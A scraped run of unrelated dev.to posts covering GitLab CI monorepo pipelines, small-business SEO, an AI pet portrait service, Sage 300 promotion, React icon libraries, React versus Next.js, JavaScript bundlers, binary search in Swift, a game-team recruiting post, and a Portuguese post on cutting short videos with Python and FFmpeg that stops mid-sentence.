understand the scope, impact of changes, and dependencies of jobs. ## How to solve this? We will perform a series of steps to optimize the above pipeline. Let’s start. ### Parent-Child Pipelines Architecture With this approach, you will create a child pipeline, meaning a separate CI/CD file, only for that particular project. Move the relevant code into that project’s `.gitlab-ci.yml`. Below is the example for `project-a`, and similarly, it can be replicated for `project-b` and `project-c`: **project-a/.gitlab-ci.yml**: ```yml stages: - build - test - deploy build-a: stage: build script: - ... test-a: stage: test script: - ... deploy-a: stage: deploy script: - ... ``` Then, link the child pipeline to the parent as below: **Root .gitlab-ci.yml:** ```yml stages: - triggers trigger-project-a: stage: triggers trigger: include: project-a/.gitlab-ci.yml trigger-project-b: stage: triggers trigger: include: project-b/.gitlab-ci.yml trigger-project-c: stage: triggers trigger: include: project-c/.gitlab-ci.yml ``` With this simple refactor, the pipeline structure becomes more manageable: ![Screenshot after implementing Parent-child architecture](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/q40xaqqhzsqfp66amd4k.png) ### Use rules: changes To scope job execution to project-level changes, we can modify the pipeline to trigger jobs only when changes are made to specific projects. **Root .gitlab-ci.yml:** ```yml stages: - triggers trigger-project-a: stage: triggers trigger: include: project-a/.gitlab-ci.yml rules: - changes: - project-a/**/* trigger-project-b: stage: triggers trigger: include: project-b/.gitlab-ci.yml rules: - changes: - project-b/**/* trigger-project-c: stage: triggers trigger: include: project-c/.gitlab-ci.yml rules: - changes: - project-c/**/* ``` If you see duplicate pipelines running (a commit to a branch triggering the pipeline twice), you can add the following rule: ```yml trigger-project-a: rules: - if '$CI_PIPELINE_SOURCE == "merge_request_event"' when: never ``` **Result:** ![Screenshot after implementing rules:changes](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kus2neb9zm7sbni5bkpr.png) ### Use YAML Anchors: YAML anchors allow for the reuse of common configuration blocks, increasing reusability and reducing redundancy, especially when targeting multiple environments like dev, QA, staging, and prod. **project-a/.gitlab-ci.yml:** ```yml .base-build: stage: build image: node:22-alpine variables: ... before_script: - cd project-a build-a-dev: extends: .base-build script: - export ENV = "dev" - // build steps for dev build-a-qa: extends: .base-build script: - export ENV = "qa" - // build steps for qa build-a-staging: extends: .base-build script: - export ENV = "staging" - // build steps for staging build-a-prod: extends: .base-build script: - export ENV = "prod" - // build steps for prod ``` If you want to reuse only specific blocks of an anchor, you can use `!reference` as below: ```yml build-a-dev: before_script: !reference [.base-build, before_script] script: - export ENV = "dev" - // build steps for dev ``` ### Using needs for Proper Job Chaining We can create dependencies between jobs using `needs`, ensuring proper execution order. ```yml build-a: stage: build script: - ... test-a: stage: test needs: [build-a] script: - ... deploy-a: stage: deploy needs: [test-a] script: - ... ``` **Result:** ![Screenshot after implementing needs](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/48acv0ufm86g4bcdgrf8.png) ### Parallel Job Execution To execute multiple jobs in parallel, for example, if there’s a check stage before the build stage, with a check-a job performing static code analysis, lint checks, etc., you can configure it as below: ```yml stages: - check - build - ... check-a: stage: check needs: [] script: - ... build-a: stage: build needs: [] script: - ... test-a: stage: build needs: [build-a] script: - ... deploy-a: stage: build needs: [test-a] script: - ... ``` **Result:** ![Screenshot for parallel execution](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/srk1n5zxcv37k16qvwac.png) ## Source Code You can find the source code here: https://gitlab.com/iChintanSoni/learning-ci-cd/ ## Conclusion Optimizing CI/CD pipelines in a monorepo setup can significantly enhance the efficiency, readability, and maintainability of your projects. By adopting best practices such as using parent-child pipeline architecture, applying rules: changes, leveraging YAML anchors, and strategically utilizing needs for job chaining, you can create a more robust and scalable pipeline. These techniques not only help in minimizing unnecessary job executions but also streamline the overall development workflow, making it easier to manage complex projects. By implementing these best practices, you ensure that your CI/CD processes are both efficient and adaptable to the evolving needs of your monorepo. I hope this guide helps you in refining your GitLab CI/CD pipelines. If you have any questions or additional tips, feel free to share them in the comments below. Happy coding!
ichintansoni
1,907,061
How Small Business Owners Can Boost Their Website’s SEO Without Paying Others
For many small business owners, improving their website’s SEO can seem like a daunting and expensive...
0
2024-07-01T02:29:50
https://dev.to/juddiy/how-small-business-owners-can-boost-their-websites-seo-without-paying-others-1o7l
seo, learning, website
For many small business owners, improving their website’s SEO can seem like a daunting and expensive task. However, there are several effective strategies that you can implement on your own to enhance your site's visibility without needing to hire outside help or break the bank. Here are some practical steps to boost your website's SEO on a budget. #### 1. Focus on High-Quality Content Creating valuable and engaging content is one of the most powerful ways to improve your SEO. Here’s how to do it effectively: - **Identify Your Target Audience**: Understand who your ideal customers are and what they’re searching for. Create content that addresses their needs and interests. - **Use Keywords Wisely**: Perform keyword research using tools like Google Keyword Planner or Ubersuggest. Choose relevant keywords that have a good balance between search volume and competition. Incorporate these keywords naturally into your content, including in headlines, body text, and meta descriptions. - **Create Long-Form Content**: Long-form articles (1,500 words or more) often rank better because they provide more comprehensive information. Aim to cover your topics in depth to provide real value to your readers. #### 2. Optimize Your Website's Structure A well-organized website is easier for search engines to crawl and index. Here’s how to improve your site structure: - **Simplify Navigation**: Make sure your navigation menu is straightforward and user-friendly. This helps visitors and search engines find what they’re looking for quickly. - **Use Internal Links**: Linking to other pages on your site helps search engines understand the relationship between your pages and keeps visitors engaged longer. For example, link related blog posts or products. - **Create a Sitemap**: A sitemap helps search engines discover and index all the pages on your site. You can create a sitemap manually or use plugins if you’re using platforms like WordPress. #### 3. Optimize Your Images Images are a vital part of your website, but they need to be optimized for better SEO. Here’s how to do it: - **Use Descriptive File Names**: Instead of generic names like “IMG1234.jpg,” use names that describe the image and include relevant keywords, such as “artisan-coffee-beans.jpg.” - **Add Alt Text**: Alt text provides a description of the image to search engines and users with visual impairments. Include your keywords here, but keep the description natural and relevant. - **Compress Your Images**: Large images can slow down your site, which can negatively impact your SEO. Use tools like TinyPNG or ImageOptim to compress your images without sacrificing quality. #### 4. Enhance User Experience (UX) Search engines like Google prioritize websites that provide a great user experience. Here are some tips to enhance UX on your site: - **Ensure Mobile-Friendliness**: With more people browsing on mobile devices, it’s crucial that your site is responsive and works well on all screen sizes. You can use Google’s Mobile-Friendly Test to check your site’s performance on mobile. - **Improve Page Load Speed**: Fast loading times are critical for both users and search engines. Minimize the use of heavy scripts and optimize your images to ensure your site loads quickly. - **Use Clear and Engaging Layouts**: Make your content easy to read with clean, simple layouts. Use headings, subheadings, and bullet points to break up text and guide your readers through your content. #### 5. Leverage Free SEO Tools There are numerous free tools available that can help you analyze and improve your site’s SEO. Here are a few to get you started: - **Google Search Console**: This tool provides insights into how Google views your site, including search performance, crawl errors, and security issues. It’s essential for monitoring and improving your SEO. - **Google Analytics**: Understand your site’s traffic, user behavior, and more with Google Analytics. This data can help you make informed decisions about your content and SEO strategy. - **Yoast SEO** (for WordPress users): This popular plugin helps you optimize your site’s content, manage meta tags, and generate XML sitemaps. - **SEO AI**: [A powerful tool](https://seoai.run/) for keyword detection, scoring, and evaluating webpage structure. It provides actionable insights to improve your site’s SEO without needing technical expertise. #### 6. Utilize Social Media and Online Directories While social media itself is not a direct SEO ranking factor, it can drive traffic to your site and improve your online visibility. Here’s how to make the most of it: - **Share Your Content on Social Media**: Promote your blog posts, products, and services on platforms like Facebook, Twitter, and LinkedIn. This can drive more traffic to your site and increase your chances of earning backlinks. - **List Your Business in Online Directories**: Adding your business to directories like Google My Business, Yelp, and Bing Places can improve your local SEO and make it easier for customers to find you. ### Conclusion You don’t need a big budget to improve your website’s SEO. By focusing on high-quality content, optimizing your site structure and images, enhancing user experience, and leveraging free tools and social media, you can significantly boost your website’s visibility in search engines. These strategies are all about working smarter, not harder, and they can make a real difference in your online presence.
juddiy
1,907,058
DreamPetsAI
DreamPets: AI Pet Portrait is the ultimate solution for transforming your pet photos into exquisite...
0
2024-07-01T02:18:53
https://dev.to/dreampetsai/dreampetsai-2ap
social, photo, pet
DreamPets: AI Pet Portrait is the ultimate solution for transforming your pet photos into exquisite works of art. Powered by state-of-the-art artificial intelligence, this innovative tool goes beyond mere filters to artistically interpret each image, ensuring that every portrait is a masterpiece that captures the essence and spirit of your furry companion.Whether you're seeking a vibrant digital artwork or a classic canvas print, DreamPets: AI Pet Portrait delivers unparalleled quality and attention to detail. Simply upload your favorite pet photo, and within moments, experience the transformation as your pet's unique features are enhanced and immortalized in a stunning portrait. Ideal for decorating your home, commemorating milestones, or surprising loved ones with a heartfelt gift, this tool merges technology with creativity to celebrate the love and joy pets bring to our lives. https://dreampets.ai/ https://x.com/DreamPetsAI https://www.instagram.com/dreampetsapp
dreampetsai
1,907,057
Acsolv Consult - 7 Ways a Business Owner Can Use Sage 300
Part 1: Unleashing the Power of Sage 300 - 7 Innovative Ways for Business Owners Hey there,...
0
2024-07-01T02:11:03
https://dev.to/aj_52dae09af6cbdd8437a5df/acsolv-consult-7-ways-a-business-owner-can-use-sage-300-2ap3
sage300singapore
Part 1: Unleashing the Power of Sage 300 - 7 Innovative Ways for Business Owners Hey there, visionary business owners and trailblazers! Are you ready to dive into the exciting world of Sage 300 and discover the endless possibilities it holds for transforming your business operations? Buckle up as we explore seven unique and game-changing ways you can harness the power of [Sage 300 in Singapore](https://acsolv.com/solution/sage-300cloud/) to supercharge your business growth! ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/u3ri6c2zrbstg9rr2btw.png) Way 1: Financial Mastery Let's kick things off with a bang! Sage 300 isn't just a software; it's your financial wizard. It helps you keep your finger on the pulse of your business's financial health. From managing accounts payable and receivable to generating comprehensive financial reports, Sage 300 transforms the daunting realm of numbers into a strategic advantage. Way 2: Inventory Intelligence Tired of those midnight inventory nightmares? Say goodbye to them! Sage 300 [lets you manage your inventory like a pro.](https://acsolv.com/solution/sage-300cloud/) With real-time tracking and analysis, you'll know what's flying off the shelves and what's gathering dust. It's like having a crystal ball that guides your inventory decisions with precision. Way 3: Customer Relationship Charmer Building strong customer relationships is the secret sauce of business success. Sage 300 in Singapore isn't just about data; it's about people. It helps you nurture customer relationships by tracking interactions, analysing buying patterns, and tailoring your offerings to their needs. It's like having a personalised concierge for every customer. Part 2: The Sage 300 Revolution Hello, business revolutionaries! Let's dive deeper into the Sage 300 revolution and explore four more extraordinary ways this innovative solution can elevate your business strategies and drive growth like never before. Way 4: Project Management Prodigy Every successful project needs a conductor, and that's where Sage 300 steps in. It's not just about managing tasks; it's about orchestrating the entire project lifecycle. From resource allocation to progress tracking, Sage 300 ensures that your projects hit all the right notes and deliver exceptional results. Way 5: Multi-Currency Marvel In today's global marketplace, dealing with multiple currencies can be a headache. But fear not! Sage 300 in Singapore is your multi-currency hero. It simplifies international transactions, eliminates currency conversion confusion, and ensures that your financial dealings are as smooth as silk, no matter where in the world you're doing business. Way 6: Data-Driven Decision Dynamo Gone are the days of making decisions based on gut feelings. Sage 300 empowers you to [make data-driven decisions](https://acsolv.com/solution/sage-300cloud/) that propel your business forward. With advanced analytics and real-time insights, you'll have a 360-degree view of your business performance, allowing you to seize opportunities and tackle challenges with confidence. Way 7: Compliance Champion Navigating the complex landscape of regulatory compliance can be daunting. But don't fret! Sage 300 is your compliance companion. It helps you stay on top of changing regulations, streamline reporting, and ensure that your business operations adhere to legal requirements, giving you peace of mind and minimising risks. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nb4fjxyuo8cyhkyl0zq7.png) Part 3: Your Next Bold Step Hey, fearless business leaders! Now that you've discovered the seven incredible ways to leverage Sage 300 for your business, it's time to take action and unlock the true potential of your enterprise. Imagine the efficiency of streamlined financial management, the precision of inventory control, and the personalised touch of enhanced customer relationships. Envision projects running like well-oiled machines, international transactions without a hitch, and decisions backed by real-time data. Your next bold step is simple: Embrace Sage 300. Explore its features, understand how it aligns with your business goals, and seize the opportunity to transform your business landscape. Remember, every successful journey starts with that courageous first step, and Sage 300 is your catalyst for business brilliance. Are you ready to revolutionise your business? The journey begins now with Acsolv Consult to learn more about Sage 300. [Visit them today](https://www.acsolv.com/) to learn more.
aj_52dae09af6cbdd8437a5df
1,907,056
Struggling with Brand Icons in Web Development? Try Simple Icons!
Choosing a useful library can be tricky during web development because each library has its pros and...
0
2024-07-01T02:01:49
https://dev.to/deni_sugiarto_1a01ad7c3fb/struggling-with-brand-icons-in-web-development-try-simple-icons-fkd
react, icon, library, webdev
Choosing a useful library can be tricky during web development because each library has its pros and cons. Today, I want to share the icon libraries I frequently use. For standard icons like mail and phone, I prefer [Lucide Icons](https://lucide.dev/icons/). Lucide Icons offers a wide range of high-quality, customizable icons that are perfect for everyday use in web applications. They are lightweight and easy to implement, making them a great choice for developers who need a reliable set of standard icons. However, when it comes to brand icons, Lucide Icons doesn’t always have what I need. After some research, I discovered Simple Icons. You can check out this library at Simple Icons. Since I use React, I integrated their package library. Simple Icons offers “3150 Free SVG icons for popular brands,” which is amazing. After incorporating it into my projects, it perfectly addressed my need for standard brand icons. Here’s a quick example of how to use Simple Icons in a React project: First, install the necessary package: ``` npm install react-icons simple-icons ``` Then, you can use the icons in your React components like this: ``` import React from 'react'; import { SiReact, SiNextDotJs, SiJavascript, SiTypescript } from 'react-icons/si'; const IconExample = () => ( <div> <h1>Using Simple Icons in React</h1> <div> <SiReact size={40} color="#61DBFB" /> <SiNextDotJs size={40} color="#000000" /> <SiJavascript size={40} color="#F7DF1E" /> <SiTypescript size={40} color="#3178C6" /> </div> </div> ); export default IconExample; ``` In this example, we import icons for React, Next.js, JavaScript, and TypeScript from the react-icons package, which includes icons from Simple Icons. We then use these icons in a simple React component. #react #simpleicons #Nextjs #WebDevelopment #javascript #typescript
deni_sugiarto_1a01ad7c3fb
1,907,055
React vs. Next.js: A Comparative Guide for Modern Web Development
In frontend development, React and Next.js are two prominent technologies that often come up in...
0
2024-07-01T01:56:57
https://dev.to/juliet_obi/react-vs-nextjs-a-comparative-guide-for-modern-web-development-1o8m
In frontend development, React and Next.js are two prominent technologies that often come up in discussions. Well React is a library for building user interfaces while Next.js is a framework built on top of React that provides additional features and optimizations. Let's explore their core differences, strengths, and what makes them stand out. Additionally, I will share my expectations for the [https://hng.tech/internship,] (https://hng.tech/internship,), where React.js is the primary technology, and how I feel about working with React. **React**: The Library for Building User Interfaces React, developed by Facebook, is a popular JavaScript library for building dynamic user interfaces. It allows developers to create reusable UI components and manage the state of applications efficiently. **Key Features** - **Component-Based Architecture:** React encourages building encapsulated components that manage their own state and can be composed to create complex UIs. - **Virtual DOM:** Efficiently updates and renders only the components that have changed, improving performance. - **Unidirectional Data Flow:** Easier to debug and understand the flow of data within an application. **Next.js:** The React Framework for Production Next.js, created by Vercel, is a framework built on top of React that provides a comprehensive solution for building production-ready applications. It extends React's capabilities with features like server-side rendering, static site generation, and API routes. **Key Features** - **Server-Side Rendering (SSR):** Improves performance and SEO by delivering fully rendered pages to the client. - **API Routes:** Built-in API routing system, enabling developers to create backend endpoints within the same application. - **File-Based Routing:** Simplifies route management. - Automatic Code Splitting: Optimizes the loading performance of applications. **Core Differences** **Rendering Methods:** **React:** Primarily client-side rendering. **Next.js:** Supports SSR, SSG, and client-side rendering out of the box. **Routing:** **React:** Requires a separate library like React Router. **Next.js:** Built-in file-based routing system. **Performance:** **React:** Relies on client-side rendering. **Next.js:** Optimized for performance with SSR, SSG, and automatic code splitting. **Development Experience:** **React:** Offers flexibility and control over the project structure. **Next.js:** Provides a more opinionated structure with sensible defaults. In the [ https://hng.tech/hire,]( https://hng.tech/hire,), where React is primarily used to build user interfaces. I am excited to dive deeper into React and leverage its component-based architecture to create dynamic and reusable UI components. I expect to learn advanced state management techniques, improve my understanding of React's lifecycle methods, and gain hands-on experience with popular libraries in the React ecosystem. I find React to be a powerful and versatile library that strikes a good balance between flexibility and structure. Its component-based approach aligns well with how I think about building UIs, and the virtual DOM optimizations provide a smooth user experience. The large community and extensive ecosystem make it easier to find resources and solutions. React and Next.js are both powerful tools in the frontend development landscape, each with its unique strengths. React provides a solid foundation for building user interfaces, while Next.js extends React's capabilities with features that enhance performance and scalability. Understanding their differences and knowing when to use each can significantly impact the success of a project. By leveraging the strengths of both React and Next.js, developers can create robust and high-performing web applications that deliver exceptional user experiences.
juliet_obi
1,906,956
HNG STAGE 0 TASK
The first website was created by on August 6 1991 by British Computer Scientist Thomas Bernie Lee and...
0
2024-06-30T21:52:50
https://dev.to/frontendokeke/hng-stage-0-task-3kel
The first website was created by on August 6 1991 by British Computer Scientist Thomas Bernie Lee and it contained information about the World Wide Web Project. It launched at the European Organization for Nuclear Research, CERN. On it, people could find out how to create web pages and learn about hypertext (coded words or phrases that link to content). Tim Berners-Lee is also credited with developing the first web browser, Many others were soon developed, with Marc Andreessen's 1993 Mosaic (later Netscape), being particularly easy to use and install, and often credited with sparking the internet boom of the 1990s. JavaScript, the language of the web was invented by Brendan Eich in 1995. It was developed for Netscape 2, and became the ECMA-262 standard in 1997. The invention of javascript provided great opportunities for developers to build impressive functionalities that run right in the browser but had created new problems, one of which entailed organizing javascript source files for a single web page. The open nature of the web also provided for multiple solutions to be built for the same problems allowing developers a decent selection of solutions for whatever problems they faced while building for the web. The best way to organize and assemble multiple JavaScript code files into one file is to use module bundlers. **JAVASCRIPT MODULE BUNDLERS ** A bundler is a development tool that combines multiple JavaScript code files into a single one that can be loaded in the browser and used in production. Generating a dependency graph when a bundler traverses your first code files is an outstanding feature. This implies that the module bundler keeps track of your source files’ and third-party’s dependencies starting at your provided entry point. Dependency graph generation and eventual bundling are the two stages of a bundler’s operation. The common JavaScript bundlers are Webpack and Rollup **COMPARISON BETWEEN ROLLUP AND WEBPACK ** Rollup is a JavaScript module bundler that focuses on providing a simple and efficient way to bundle JavaScript code for modern web development. It is known for its tree-shaking capabilities, which eliminate unused code during the bundling process, resulting in smaller bundle sizes. Webpack is a powerful module bundler for JavaScript applications. It allows developers to bundle and optimize their code, including JavaScript, CSS, and images, into a single output file. Configuration Webpack is highly configurable and allows for complex setups, making it suitable for large-scale projects with diverse requirements. Rollup, on the other hand focuses on simplicity. It has a simpler configuration model, which makes it easier to set up and use for small to medium-sized projects. Bundle Size Rollup generally produces smaller bundle sizes compared to Webpack. It is known for its tree-shaking capabilities, allowing it to eliminate unused code and optimize the output significantly. Webpack, while it provides some optimization options, tends to have larger bundle sizes by default. Code Splitting Webpack has more advanced code splitting capabilities and provides various strategies for splitting code into separate bundles. Rollup also supports code splitting but has more limited options compared to Webpack. Module Formats Both Webpack and Rollup support multiple module formats such as ES modules, CommonJS, and AMD. However, Rollup is known for its excellent support for ES modules and is often preferred for projects targeting modern browser environments. Webpack, on the other hand supports a broader range of module formats, making it suitable for projects with legacy codebases. Build Speed Rollup is generally faster than Webpack when it comes to build times. It has a simpler and more streamlined build process, which leads to faster bundling. Webpack, due to its extensive feature set, can take longer to build, especially for larger projects. Community and Ecosystem Webpack has a larger and more established community compared to Rollup. It has a vast ecosystem of plugins, loaders, and tools developed by the community, which helps with integrating various technologies and simplifying complex setups. Rollup, while it has a smaller community, still has a decent number of plugins and tools available, but the ecosystem is not as extensive as Webpack's. This article is a product of my hng [intership](https://hng.tech/hire) journey. Learn more about hng [here](https://hng.tech/intership)
frontendokeke
1,907,052
Simplifying The Stack: Angular or React - A Developer's Decision Guide in 2024
Introduction In the fast-growing world of frontend development, you can live or die with your chosen...
0
2024-07-01T01:52:22
https://dev.to/rayrugie/simplifying-the-stack-angular-or-react-a-developers-decision-guide-in-2024-1a0i
react, angular, frontend, webdev
**Introduction** In the fast-growing world of frontend development, you can live or die with your chosen technology. Today React and Angular are two of the most popular frontend frameworks There are various such that all have different features and advantages. This article covers the important differences and even more importantly what aspect of each tool shines through in this comparison. So I will share my own expectations and experience with React as a participant in the HNG Internship program doing using ReactJS. **What is React?** React is a JavaScript library which was released by Facebook in 2013, used for building user interfaces. It follows a component-based architecture which means you can create UI components that are reusable. React is very performant, simple and flexible. It simply uses a Virtual DOM to render and efficiently updating components that in turn makes the user experience better. **Key Features of React** 1. Component-Based Architecture - UI is broken down into reusable components, 2. Virtual DOM: Improved performance due to lesser direct manipulation of the Document Object Model. 3. One-Way Data Binding: This predictability, which is easy to debug code However there is a wide rich ecosystem of libraries and utilities to enhance it. **What is Angular?** Angular is a complete web application framework created and supported by Google since the year 2010. This contrasts with React that behaves like a library where you have to plug in other libraries or frameworks to fully utilize it in your project. Among other things it offers, out-of-the-box functionality for form validation, routing, as well as an HTTP client. In extension, unlike JavaScript, it employs TypeScript which is statically typed enabling developers to make applications at scale as it has extra syntax features. **Key Features of Angular** 1. Two-way data binding: A feature that makes sure that any changes to the model can be traced to the view immediately; 2. Dependency injection: a way of managing component instantiation and relationships between them; 3. comprehensive toolkit: A toolbox that has everything you need to develop a whole application; 4. Reactive programming using RxJS: use of tools that are very helpful when dealing with asynchronous data streams. **Comparing React and Angular** **Learning Curve:** React is simpler than Angular, which means that newbies may find it easier to learn. Since JavaScript (or JSX) is used, it is preferable for those who already know JavaScript. In contrast, Angular takes some time to get used to due to its cumbersome nature and TypeScript, although it comes as a full package. **Performance:** React shines in performance owing to its virtual DOM and efficient rendering. This performance is further enhanced by its component-based approach that ensures only the required parts of UI are updated. Angular, on the other hand, has robust performance but its two-way data binding tends to introduce unnecessary performance overheads in some cases. However, when used with Ahead-Of-Time (AOT) compilation Angular can significantly boost performance because it compiles code before it is loaded into a browser tabular form. **Flexibility:** React can be very flexible in that it can be combined with various libraries and tools. As a result of this, it is easy to choose the most appropriate tools for its implementation by developers. Angular on the other hand is relatively less malleable compared to React because it is all-inclusive coming with its tools and features. This makes it ideal for teams looking out for uniform development. **My Experience with React in the HNG Internship** During my internship at the HNG I had an experience with React. The most important framework utilized in almost all our projects is ReactJS. The aspect of component-based architecture in React has made it easier for the team to effectively develop growth able applications that are easy to maintain at the same time. Our applications are now reputable for being swift and highly responsive, since the introduction of virtual DOM to React. React boasts of an extremely wide ecosystem within which we rely on so many tools and libraries for improving the development process. I cannot express enough how much of an amazing learning experience I have had being part of the HNG Internship; I have been able to engage with actual programs, work with some really good programmers while better grasping ReactJS. And all these thanks to the mentorship program and practical approach taken during learning! I am so motivated to keep on working with react!. In conclusion, React and Angular each possess their strengths which makes them suitable solutions based on the kind of project requirements needed. In the case where one might need to make interfaces quickly without any baggage attached then it means React is the best choice for him/her on the other hand; If developers work together collaboratively within one code base or team structure they should choose Angular because it offers everything in one package. Ultimately what matters most is that you use what fits into your project requirements as well as the skills available from your teammates. If the HNG Internship and its opportunities fascinate you, then here are links worth visiting {% embed https://hng.tech/internship %} {% embed https://hng.tech/premium %}
rayrugie
1,906,871
The Power of Binary Search
We have the following scenario: We have been given the task of searching for the Product red water...
0
2024-07-01T01:51:52
https://dev.to/luizrebelatto/the-power-of-binary-search-1b5d
algorithms, swift, tutorial, ios
We have the following scenario: We have been given the task of searching for the Product red water bottle in a supermarket stock, in this stock there are 10,000 registered products. --- ## What is Linear Search? ![Linear Search](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wrt79lz0up2jolctbfz5.png) - It's a simple search algorithm that searches element by element sequentially, with the first element having index 0. - Imagine that it takes 1 second to go through each element and the desired product is in position 4,500, this would take 1:15h to find. A totally unfeasible process. - In large lists, the cost is higher the maximum number of attempts is equal to the size of the list. - execution time O(n) -> Execution time increases linearly with the size of the data input. ``` import Foundation func linearSearch(array: [Int], key: Int) -> Int? { for index in 0..< array.count { if array[index] == key { return index } } return nil } let numbers = [5, 3, 8, 1, 2, 9, 4, 10 , 11] if let index = linearSearch(array: numbers, key: 9) { print("Item found in the index \(index)") } else { print("Item not found") } ``` --- ## What is Binary Search? This data structure has some characteristics such as: - To use it, the list must be sorted; if it is not sorted, you can use a sorting algorithm. - execution time O(log n) -> n is the number of elements in the list Many frameworks already have this implemented. - To calculate the number of attempts, log2(n) is used. - The first step is to define the highest point, the lowest point and the middle. **Left = 0 (start of array)** **Right = array size minus 1** **Middle = (left + right) / 2 (always integer division) ** ### OBSERVATIONS: - if left and right meet, the target does not exist in the array - if middle > target then right will swap places and go to a position before middle - if middle < target then left will swap places and move to a position after middle - if the middle is equal to the target, we find the result Suppose you want to find the number 100 in the array below: ![array](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/l1aei62njelyd6nxdb4s.png) Set the initial values of the lower, higher and middle points ``` left = 0 right = array.count - 1 (7) middle = (left + right) / 2 (3) ``` ![array](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8cwkshq5tdgmo0iv086m.png) Our target is 100, so we compare the middle with the target: - middle < target, then we take the left and drag it 1 position in front of the middle ``` left = 4 right = array.count - 1 (7) middle = (left + right) / 2 (5) ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/exq12db0mmlw5wn055qy.png) - we'll do the checks and assignments again until we find the target - middle == target ``` left = 5 middle = (left + right) / 2 (6) right = array.count - 1 (7) ``` ![array](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/h905ol9lww0acsecq2l7.png) --- ### When not to use Binary search: - List with little data, use linear search to avoid over-engineering - If you need to access the data sequentially, it's better to choose another strategy to apply. - If the list has a lot of deletions and insertions, it will be difficult to use because you will always need to sort it. - Where the data is distributed in several places --- ## Leetcode Example [704. Binary Search](https://leetcode.com/problems/binary-search/description/) Given an array of integers `nums` which is sorted in ascending order, and an integer `target`, write a function to search `target` in `nums`. If `target` exists, then return its index. Otherwise, return -1. You must write an algorithm with `O(log n)` runtime complexity. Example 1: Input: nums = [-1,0,3,5,9,12], target = 9 Output: 4 Explanation: 9 exists in nums and its index is 4 Example 2: Input: nums = [-1,0,3,5,9,12], target = 2 Output: -1 Explanation: 2 does not exist in nums so return -1 Constraints: - `1 <= nums.length <= 104` - `104 < nums[i], target < 104` - All the integers in `nums` are unique. - `nums` is sorted in ascending order. #### Answer ``` func search(_ nums: [Int], _ target: Int) -> Int { var left = 0 var right = nums.count - 1 // will run until left and right meet while left <= right { var middle = (right + left) / 2 if nums[middle] == target { return middle } else if nums[middle] < target { // if middle < target, advance to a position in front of middle left = middle + 1 } else { // if middle > target, move to a position behind middle right = middle - 1 } } // if none is found, return -1 return -1 } ``` --- ## List Exercises Leetcode - List: [Link](https://leetcode.com/tag/binary-search/) - Repository with my solutions: [Link](https://github.com/Luizrebelatto/Exercises-algorithms) --- Contact Me: - [Linkedin](https://www.linkedin.com/in/luizgabrielrebelatto/)
luizrebelatto
1,907,054
Multiplayer game implementation
Our team is working on a player implementation [In the direction 'Fall Guys' and a blunder humor As...
0
2024-07-01T01:49:15
https://dev.to/seikler/multiplayer-game-implementation-1o9e
webdev, beginners, learning, design
Our team is working on a player implementation [In the direction 'Fall Guys' and a blunder humor As in 'Worms3D' ] Our team consists of: - Two level designer - A programmer -Two marketing experts - an atmosphere, designer And me?, Animation is my direction. It is never wrong to ask people who have the desire and time to take on a greater challenge. Then your whole house can be pulled, which is attached to ropes and pulled by a whole crew. Consequently, the bigger the house, the better it is to take part in the house, because it will be less difficult for those who are already enthusiastic about it :) It is a long-term project. What is expected to get the first maiden flight in two years. If you are interested, just write. A phone call is also very much appreciated, whether with or without a camera. Ask questions and further information will then be provided in case of serious interest. And again quite marginally said The work is a lot and the pay is bad And to bring that again in a good context, I simply quote Gimli From Lord of the Rings "a high probability of death, a narrow prospect of success. What are we waiting for!'" . Greetings from Bavaria To you out there 🙋‍♂️🙂
seikler
1,906,177
Automações: Editando Shorts com programação
O problema: Tempo. Tenho pouco tempo para gravar conteúdos para o canal e queria aproveitar os...
0
2024-07-01T01:48:31
https://dev.to/thedigitalbricklayer/automacoes-editando-shorts-com-programacao-27de
development, python, shorts, developer
O problema: Tempo. Tenho pouco tempo para gravar conteúdos para o canal e queria aproveitar os vídeos longos que faço para o formato vertical. Eu pegava esses vídeos longos, gerava uma lista com 5-6 vídeos curtos (shorts <1 minuto) para então jogar no editor e cortar esses vídeos, converter no formato vertical, colocar a logo do canal e ctas (call to action, curte, comenta, se inscreve e informando que era um vídeo curto para um vídeo maior). Isso consome muito tempo, e trabalho manual que minha mão grita de dor pois tenho lesões nas duas mãos. Quebrando o problema em etapas menores: - Cortar os vídeos em tamanho máximo de 59 segundos. - Converter os vídeos para formato vertical, eu gravo em 16:9 formatos verticais são 9:16. - Adicionar o layer de cta do canal ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m18csfl5i3owoz09bxx3.gif) Iremos falar da primeira etapa hoje, cortar os vídeos em no máximo 59 segundos. Aqui tem um trabalho manual de assistir o vídeo e anotar uma minutagem de início, fim e nome do arquivo para o corte ser realizado. Feito essa planilha no formato csv, ela será o input do script que escrevi e vou ler a mesma utilizando a lib csv do python. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/omou1yeyogi2th3of9tk.png) Faço validação pois preciso ter os campos que mencionei acima e sigo para criar os vídeos no formato vertical. Nesse ponto para cada vídeo longo eu vou criar n vídeos dependendo das entradas da planilha e o nome dos arquivos segue o formato abaixo: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fjii566f3tp8s97vghyf.png) Onde um dicionário foi criado para marcar o nome do arquivo de saída com um contador, pois para cada entrada abaixo vai ser formado uma saída dessa forma: {basename}_{counter}{extension} Em outras palavras, informado a planilha abaixo: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lfiav5o0kfa8250orb8f.png) Eu tenho a saída: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wn5cvig80kzoxzacc3fh.png) Tudo certo, agora precisamos cortar o vídeo de fato, para isso vamos utilizar FFmpeg, software utilizado para manipular, editar etc arquivos de áudio e vídeo. Procurando na doc e stackoverflow e chat gpt para explicar os comandos consegui realizar o comando abaixo: Estou rodando o ffmpeg no terminal e os comandos ditam: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yk7xuwr6zih8pixlc1zv.png) “”ss” - Inicio do corte “to” - Fim do corte “-i” - Arquivo de entrada” Rodando 